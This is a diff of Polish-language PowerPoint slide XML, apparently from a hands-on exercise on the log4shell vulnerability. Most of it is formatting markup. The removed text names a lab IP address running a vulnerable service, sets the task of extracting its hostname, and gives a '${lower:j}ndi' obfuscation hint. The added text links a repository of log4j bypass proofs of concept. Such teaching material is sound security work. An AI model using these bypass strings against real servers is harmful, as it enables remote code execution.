+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClr>
+                <a:schemeClr val="dk1"/>
+              </a:buClr>
+              <a:buSzPts val="2800"/>
               <a:buNone/>
             </a:pPr>
             <a:endParaRPr lang="pl-PL" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="292929"/>
-              </a:solidFill>
-              <a:latin typeface="Arial"/>
-              <a:ea typeface="Arial"/>
-              <a:cs typeface="Arial"/>
-              <a:sym typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="63500" lvl="0" indent="0" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:srgbClr val="292929"/>
-              </a:buClr>
-              <a:buSzPts val="1800"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="pl-PL" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="292929"/>
-              </a:solidFill>
-              <a:latin typeface="Arial"/>
-              <a:ea typeface="Arial"/>
-              <a:cs typeface="Arial"/>
-              <a:sym typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="63500" lvl="0" indent="0" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:srgbClr val="292929"/>
-              </a:buClr>
-              <a:buSzPts val="1800"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="pl-PL" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="292929"/>
-              </a:solidFill>
-              <a:latin typeface="Arial"/>
-              <a:ea typeface="Arial"/>
-              <a:cs typeface="Arial"/>
-              <a:sym typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="228600" lvl="0" indent="-165100" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:srgbClr val="292929"/>
-              </a:buClr>
-              <a:buSzPts val="1800"/>
-              <a:buFont typeface="Arial"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="292929"/>
-              </a:solidFill>
-              <a:latin typeface="Arial"/>
-              <a:ea typeface="Arial"/>
-              <a:cs typeface="Arial"/>
-              <a:sym typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="228600" lvl="0" indent="-165100" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:srgbClr val="292929"/>
-              </a:buClr>
-              <a:buSzPts val="1800"/>
-              <a:buFont typeface="Arial"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="292929"/>
-              </a:solidFill>
-              <a:latin typeface="Arial"/>
-              <a:ea typeface="Arial"/>
-              <a:cs typeface="Arial"/>
-              <a:sym typeface="Arial"/>
+              <a:latin typeface="Open Sans"/>
+              <a:ea typeface="Open Sans"/>
+              <a:cs typeface="Open Sans"/>
+              <a:sym typeface="Open Sans"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -18964,10 +19306,10 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="4" name="Google Shape;136;p9">
+          <p:cNvPr id="5" name="Google Shape;136;p9">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E7FECFE-0496-9848-B034-22C8B55D2D28}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C7D57C6-E5D6-594F-91E4-10EE1BA8FE6D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -18978,8 +19320,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2461260" y="1978025"/>
-            <a:ext cx="9795510" cy="4165600"/>
+            <a:off x="8067675" y="2639379"/>
+            <a:ext cx="893445" cy="675321"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -18991,7 +19333,7 @@
         </p:spPr>
         <p:txBody>
           <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
-            <a:normAutofit/>
+            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
           </a:bodyPr>
           <a:lstStyle>
             <a:defPPr marR="0" lvl="0" algn="l" rtl="0">
@@ -19241,174 +19583,25 @@
             </a:lvl9pPr>
           </a:lstStyle>
           <a:p>
-            <a:pPr marL="63500" indent="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:buClr>
-                <a:srgbClr val="292929"/>
-              </a:buClr>
+            <a:pPr marL="0" indent="0">
+              <a:buSzPts val="2800"/>
+              <a:buFont typeface="Arial"/>
               <a:buNone/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="pl-PL" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="292929"/>
-                </a:solidFill>
-                <a:latin typeface="Arial"/>
-                <a:ea typeface="Arial"/>
-                <a:cs typeface="Arial"/>
-                <a:sym typeface="Arial"/>
-              </a:rPr>
-              <a:t>Adres: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="pl-PL" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="292929"/>
-                </a:solidFill>
-                <a:latin typeface="Arial"/>
-                <a:ea typeface="Arial"/>
-                <a:cs typeface="Arial"/>
-                <a:sym typeface="Arial"/>
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>http://34.118.109.39:9000</a:t>
+              <a:rPr lang="pl-PL" dirty="0" err="1">
+                <a:latin typeface="Open Sans"/>
+                <a:ea typeface="Open Sans"/>
+                <a:cs typeface="Open Sans"/>
+                <a:sym typeface="Open Sans"/>
+              </a:rPr>
+              <a:t>Jndi</a:t>
             </a:r>
             <a:endParaRPr lang="pl-PL" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="292929"/>
-              </a:solidFill>
-              <a:latin typeface="Arial"/>
-              <a:ea typeface="Arial"/>
-              <a:cs typeface="Arial"/>
-              <a:sym typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="63500" indent="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:buClr>
-                <a:srgbClr val="292929"/>
-              </a:buClr>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="pl-PL" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="292929"/>
-              </a:solidFill>
-              <a:latin typeface="Arial"/>
-              <a:ea typeface="Arial"/>
-              <a:cs typeface="Arial"/>
-              <a:sym typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="63500" indent="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:buClr>
-                <a:srgbClr val="292929"/>
-              </a:buClr>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="pl-PL" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="292929"/>
-                </a:solidFill>
-                <a:latin typeface="Arial"/>
-                <a:ea typeface="Arial"/>
-                <a:cs typeface="Arial"/>
-                <a:sym typeface="Arial"/>
-              </a:rPr>
-              <a:t>Działa usługa podatna na log4shell</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="63500" indent="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:buClr>
-                <a:srgbClr val="292929"/>
-              </a:buClr>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="pl-PL" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="292929"/>
-                </a:solidFill>
-                <a:latin typeface="Arial"/>
-                <a:ea typeface="Arial"/>
-                <a:cs typeface="Arial"/>
-                <a:sym typeface="Arial"/>
-              </a:rPr>
-              <a:t>Wyciągnąć nazwę hosta.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="63500" indent="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:buClr>
-                <a:srgbClr val="292929"/>
-              </a:buClr>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="pl-PL" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="292929"/>
-              </a:solidFill>
-              <a:latin typeface="Arial"/>
-              <a:ea typeface="Arial"/>
-              <a:cs typeface="Arial"/>
-              <a:sym typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="63500" indent="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:buClr>
-                <a:srgbClr val="292929"/>
-              </a:buClr>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="pl-PL" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="292929"/>
-              </a:solidFill>
-              <a:latin typeface="Arial"/>
-              <a:ea typeface="Arial"/>
-              <a:cs typeface="Arial"/>
-              <a:sym typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="63500" indent="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:buClr>
-                <a:srgbClr val="292929"/>
-              </a:buClr>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="pl-PL" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="292929"/>
-              </a:solidFill>
-              <a:latin typeface="Arial"/>
-              <a:ea typeface="Arial"/>
-              <a:cs typeface="Arial"/>
-              <a:sym typeface="Arial"/>
+              <a:latin typeface="Open Sans"/>
+              <a:ea typeface="Open Sans"/>
+              <a:cs typeface="Open Sans"/>
+              <a:sym typeface="Open Sans"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -19424,12 +19617,174 @@
               <a:sym typeface="Open Sans"/>
             </a:endParaRPr>
           </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buSzPts val="2800"/>
+              <a:buFont typeface="Arial"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="pl-PL" dirty="0">
+              <a:latin typeface="Open Sans"/>
+              <a:ea typeface="Open Sans"/>
+              <a:cs typeface="Open Sans"/>
+              <a:sym typeface="Open Sans"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buSzPts val="2800"/>
+              <a:buFont typeface="Arial"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="pl-PL" dirty="0">
+              <a:latin typeface="Open Sans"/>
+              <a:ea typeface="Open Sans"/>
+              <a:cs typeface="Open Sans"/>
+              <a:sym typeface="Open Sans"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buSzPts val="2800"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="pl-PL" dirty="0" err="1">
+                <a:latin typeface="Open Sans"/>
+                <a:ea typeface="Open Sans"/>
+                <a:cs typeface="Open Sans"/>
+                <a:sym typeface="Open Sans"/>
+              </a:rPr>
+              <a:t>https</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" dirty="0">
+                <a:latin typeface="Open Sans"/>
+                <a:ea typeface="Open Sans"/>
+                <a:cs typeface="Open Sans"/>
+                <a:sym typeface="Open Sans"/>
+              </a:rPr>
+              <a:t>://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" dirty="0" err="1">
+                <a:latin typeface="Open Sans"/>
+                <a:ea typeface="Open Sans"/>
+                <a:cs typeface="Open Sans"/>
+                <a:sym typeface="Open Sans"/>
+              </a:rPr>
+              <a:t>github.com</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" dirty="0">
+                <a:latin typeface="Open Sans"/>
+                <a:ea typeface="Open Sans"/>
+                <a:cs typeface="Open Sans"/>
+                <a:sym typeface="Open Sans"/>
+              </a:rPr>
+              <a:t>/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" dirty="0" err="1">
+                <a:latin typeface="Open Sans"/>
+                <a:ea typeface="Open Sans"/>
+                <a:cs typeface="Open Sans"/>
+                <a:sym typeface="Open Sans"/>
+              </a:rPr>
+              <a:t>Puliczek</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" dirty="0">
+                <a:latin typeface="Open Sans"/>
+                <a:ea typeface="Open Sans"/>
+                <a:cs typeface="Open Sans"/>
+                <a:sym typeface="Open Sans"/>
+              </a:rPr>
+              <a:t>/CVE-2021-44228-PoC-log4j-bypass-words</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buSzPts val="2800"/>
+              <a:buFont typeface="Arial"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="pl-PL" dirty="0">
+              <a:latin typeface="Open Sans"/>
+              <a:ea typeface="Open Sans"/>
+              <a:cs typeface="Open Sans"/>
+              <a:sym typeface="Open Sans"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buSzPts val="2800"/>
+              <a:buFont typeface="Arial"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="pl-PL" dirty="0">
+              <a:latin typeface="Open Sans"/>
+              <a:ea typeface="Open Sans"/>
+              <a:cs typeface="Open Sans"/>
+              <a:sym typeface="Open Sans"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Equals 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2064F15E-CFE3-FA44-B31F-182C05F5D480}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="7145656" y="2754154"/>
+            <a:ext cx="586739" cy="445770"/>
+          </a:xfrm>
+          <a:prstGeom prst="mathEqual">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-PL">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2271538128"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2305747539"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -19677,624 +20032,6 @@
               <a:buNone/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="pl-PL" sz="3800" b="1" dirty="0">
-                <a:latin typeface="Open Sans"/>
-                <a:ea typeface="Open Sans"/>
-                <a:cs typeface="Open Sans"/>
-                <a:sym typeface="Open Sans"/>
-              </a:rPr>
-              <a:t>Podpowiedź</a:t>
-            </a:r>
-            <a:endParaRPr sz="3800" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="136" name="Google Shape;136;p9"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4497705" y="2639379"/>
-            <a:ext cx="2668906" cy="675321"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
-            <a:normAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="1000"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:schemeClr val="dk1"/>
-              </a:buClr>
-              <a:buSzPts val="2800"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="pl-PL" dirty="0">
-                <a:latin typeface="Open Sans"/>
-                <a:ea typeface="Open Sans"/>
-                <a:cs typeface="Open Sans"/>
-                <a:sym typeface="Open Sans"/>
-              </a:rPr>
-              <a:t>${</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="pl-PL" dirty="0" err="1">
-                <a:latin typeface="Open Sans"/>
-                <a:ea typeface="Open Sans"/>
-                <a:cs typeface="Open Sans"/>
-                <a:sym typeface="Open Sans"/>
-              </a:rPr>
-              <a:t>lower:j</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="pl-PL" dirty="0">
-                <a:latin typeface="Open Sans"/>
-                <a:ea typeface="Open Sans"/>
-                <a:cs typeface="Open Sans"/>
-                <a:sym typeface="Open Sans"/>
-              </a:rPr>
-              <a:t>}</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="pl-PL" dirty="0" err="1">
-                <a:latin typeface="Open Sans"/>
-                <a:ea typeface="Open Sans"/>
-                <a:cs typeface="Open Sans"/>
-                <a:sym typeface="Open Sans"/>
-              </a:rPr>
-              <a:t>ndi</a:t>
-            </a:r>
-            <a:endParaRPr lang="pl-PL" dirty="0">
-              <a:latin typeface="Open Sans"/>
-              <a:ea typeface="Open Sans"/>
-              <a:cs typeface="Open Sans"/>
-              <a:sym typeface="Open Sans"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="1000"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:schemeClr val="dk1"/>
-              </a:buClr>
-              <a:buSzPts val="2800"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="pl-PL" dirty="0">
-              <a:latin typeface="Open Sans"/>
-              <a:ea typeface="Open Sans"/>
-              <a:cs typeface="Open Sans"/>
-              <a:sym typeface="Open Sans"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="1000"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:schemeClr val="dk1"/>
-              </a:buClr>
-              <a:buSzPts val="2800"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr dirty="0">
-              <a:latin typeface="Open Sans"/>
-              <a:ea typeface="Open Sans"/>
-              <a:cs typeface="Open Sans"/>
-              <a:sym typeface="Open Sans"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="5" name="Google Shape;136;p9">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C7D57C6-E5D6-594F-91E4-10EE1BA8FE6D}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks/>
-          </p:cNvSpPr>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="8067675" y="2639379"/>
-            <a:ext cx="893445" cy="675321"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
-            <a:normAutofit/>
-          </a:bodyPr>
-          <a:lstStyle>
-            <a:defPPr marR="0" lvl="0" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-            </a:defPPr>
-            <a:lvl1pPr marL="457200" marR="0" lvl="0" indent="-342900" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="1000"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:schemeClr val="dk1"/>
-              </a:buClr>
-              <a:buSzPts val="1800"/>
-              <a:buFont typeface="Arial"/>
-              <a:buChar char="•"/>
-              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:schemeClr val="dk1"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-                <a:ea typeface="Calibri"/>
-                <a:cs typeface="Calibri"/>
-                <a:sym typeface="Calibri"/>
-              </a:defRPr>
-            </a:lvl1pPr>
-            <a:lvl2pPr marL="914400" marR="0" lvl="1" indent="-342900" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="500"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:schemeClr val="dk1"/>
-              </a:buClr>
-              <a:buSzPts val="1800"/>
-              <a:buFont typeface="Arial"/>
-              <a:buChar char="•"/>
-              <a:defRPr sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:schemeClr val="dk1"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-                <a:ea typeface="Calibri"/>
-                <a:cs typeface="Calibri"/>
-                <a:sym typeface="Calibri"/>
-              </a:defRPr>
-            </a:lvl2pPr>
-            <a:lvl3pPr marL="1371600" marR="0" lvl="2" indent="-342900" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="500"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:schemeClr val="dk1"/>
-              </a:buClr>
-              <a:buSzPts val="1800"/>
-              <a:buFont typeface="Arial"/>
-              <a:buChar char="•"/>
-              <a:defRPr sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:schemeClr val="dk1"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-                <a:ea typeface="Calibri"/>
-                <a:cs typeface="Calibri"/>
-                <a:sym typeface="Calibri"/>
-              </a:defRPr>
-            </a:lvl3pPr>
-            <a:lvl4pPr marL="1828800" marR="0" lvl="3" indent="-342900" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="500"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:schemeClr val="dk1"/>
-              </a:buClr>
-              <a:buSzPts val="1800"/>
-              <a:buFont typeface="Arial"/>
-              <a:buChar char="•"/>
-              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:schemeClr val="dk1"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-                <a:ea typeface="Calibri"/>
-                <a:cs typeface="Calibri"/>
-                <a:sym typeface="Calibri"/>
-              </a:defRPr>
-            </a:lvl4pPr>
-            <a:lvl5pPr marL="2286000" marR="0" lvl="4" indent="-342900" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="500"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:schemeClr val="dk1"/>
-              </a:buClr>
-              <a:buSzPts val="1800"/>
-              <a:buFont typeface="Arial"/>
-              <a:buChar char="•"/>
-              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:schemeClr val="dk1"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-                <a:ea typeface="Calibri"/>
-                <a:cs typeface="Calibri"/>
-                <a:sym typeface="Calibri"/>
-              </a:defRPr>
-            </a:lvl5pPr>
-            <a:lvl6pPr marL="2743200" marR="0" lvl="5" indent="-342900" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="500"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:schemeClr val="dk1"/>
-              </a:buClr>
-              <a:buSzPts val="1800"/>
-              <a:buFont typeface="Arial"/>
-              <a:buChar char="•"/>
-              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:schemeClr val="dk1"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-                <a:ea typeface="Calibri"/>
-                <a:cs typeface="Calibri"/>
-                <a:sym typeface="Calibri"/>
-              </a:defRPr>
-            </a:lvl6pPr>
-            <a:lvl7pPr marL="3200400" marR="0" lvl="6" indent="-342900" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="500"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:schemeClr val="dk1"/>
-              </a:buClr>
-              <a:buSzPts val="1800"/>
-              <a:buFont typeface="Arial"/>
-              <a:buChar char="•"/>
-              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:schemeClr val="dk1"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-                <a:ea typeface="Calibri"/>
-                <a:cs typeface="Calibri"/>
-                <a:sym typeface="Calibri"/>
-              </a:defRPr>
-            </a:lvl7pPr>
-            <a:lvl8pPr marL="3657600" marR="0" lvl="7" indent="-342900" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="500"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:schemeClr val="dk1"/>
-              </a:buClr>
-              <a:buSzPts val="1800"/>
-              <a:buFont typeface="Arial"/>
-              <a:buChar char="•"/>
-              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:schemeClr val="dk1"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-                <a:ea typeface="Calibri"/>
-                <a:cs typeface="Calibri"/>
-                <a:sym typeface="Calibri"/>
-              </a:defRPr>
-            </a:lvl8pPr>
